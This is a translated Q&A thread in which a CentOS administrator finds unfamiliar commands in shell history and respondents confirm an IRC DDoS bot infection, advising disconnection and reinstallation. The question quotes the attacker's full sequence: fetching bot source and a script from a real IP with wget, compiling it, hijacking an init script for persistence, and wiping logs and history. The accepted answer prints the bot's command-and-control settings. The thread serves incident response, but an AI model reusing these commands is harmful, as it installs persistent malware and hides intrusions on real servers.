Meu servidor web está sendo comprometido? [duplicado]

Question

Meu servidor web está sendo comprometido? [duplicado]

#1 resposta do (8 votos)
#2 resposta do (6 votos)
#3 resposta do (1 votos)
#4 resposta do (0 votos)
#5 resposta do (0 votos)
#6 resposta do (0 votos)

11

Nós logamos remotamente em nosso servidor CentOS hoje usando o Putty, e enquanto perambulamos pelos comandos anteriores usando a seta para cima, encontramos o seguinte:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(& & s substituídos por novas linhas para maior clareza)

Eu nunca executei esses comandos, NUNCA! Como isso aconteceu, meu servidor está sendo invadido? Eu imediatamente mudei minha senha de root, mas estava esperando que alguém pudesse fazer cara ou coroa do que está acontecendo aqui.

Eu vejo referências feitas na fonte para bots de ddos, e eu e meu colega estamos seriamente preocupados!

Obrigado antecipadamente!

centos

por Josef van Niekerk 10.02.2010 / 21:01

6 respostas

6

A resposta é, em qualquer caso, sim, seu servidor está sendo ou foi comprometido.

Você deve cortar a conexão com a Internet para o servidor imediatamente, fazer um backup completo (tenha em mente que outros arquivos também podem ser comprometidos) e reinstalar.

Além disso, você pode querer notificar os proprietários do IP de onde a rede do bot (ou o que quer que seja) é executada. Aqui está o dados Whois do RIPE.

por 10.02.2010 / 21:05

1

Nunca permita login root via SSH.

por 10.02.2010 / 21:06

0

A resposta para sua pergunta é: SIM

por 10.02.2010 / 21:03

0

Parece que você foi infectado com BOT_VERSION , em que BOT_VERSION é

#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

Seu antivírus do Linux não detectou isso?

por 10.02.2010 / 22:40

0

Eu provavelmente teria higienizado o endereço IP da máquina C & C antes de postar.

por 10.02.2010 / 22:59

Tags centos

O Gmail rejeita e-mails. Openspf.net falha nos testes Conectando dois laptops através de adaptadores sem fio sem roteador sem fio

score 8 · Accepted Answer

sim, você foi hackeado. O hacker instalou um backdoor de IRC e você está se conectando a este servidor de IRC:

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

O herder bot pode executar qualquer comando no seu servidor. Eu recomendo desligar o servidor e reinstalar imediatamente . O bot tem alguns recursos de ataque DDoS, flood DNS, flood syn e flood ICMP. Ele também funciona no Windows, o que é muito legal. Existe um módulo de propagação realmente antigo para infectar o myDoom. Isso parece um malware antigo.